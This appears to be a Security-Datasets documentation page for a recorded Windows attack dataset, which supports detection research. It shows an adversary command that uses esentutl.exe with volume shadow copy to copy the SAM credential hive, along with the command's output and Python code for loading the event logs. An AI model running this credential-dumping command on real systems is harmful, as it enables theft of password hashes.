SAM Copy via Esentutl VSS
Contents
SAM Copy via Esentutl VSS#
Metadata#
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2020/10/19 |
Modification Date |
2020/10/19 |
Tactics |
|
Techniques |
|
Tags |
art.a90c2f4d-6726-444e-99d2-a00cd7c20480 |
Dataset Description#
This dataset represents adversaries copying the SAM hive using the esentutl.exe utility and volume shadow copy services.
Datasets Downloads#
Type |
Link |
|---|---|
Host |
Adversary View#
Microsoft Windows [Version 10.0.18363.1139]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Users\wardog>esentutl.exe /y /vss %SystemRoot%/system32/config/SAM /d C:\ProgramData\SAM
Extensible Storage Engine Utilities for Microsoft(R) Windows(R)
Version 10.0
Copyright (C) Microsoft Corporation. All Rights Reserved.
Initializing VSS subsystem...
Initiating COPY FILE mode...
Source File: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32
Destination File: C:\ProgramData\SAM
Copy Progress (% complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|----|
...................................................
Total bytes read = 0x9000 (36864) (0 MB)
Total bytes written = 0x9000 (36864) (0 MB)
Operation completed successfully in 4.859 seconds.
C:\Users\wardog>
Explore Datasets#
Download & Decompress Dataset#
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/cmd_sam_copy_esentutl.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File#
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events#
df.groupby(['Channel']).size().sort_values(ascending=False)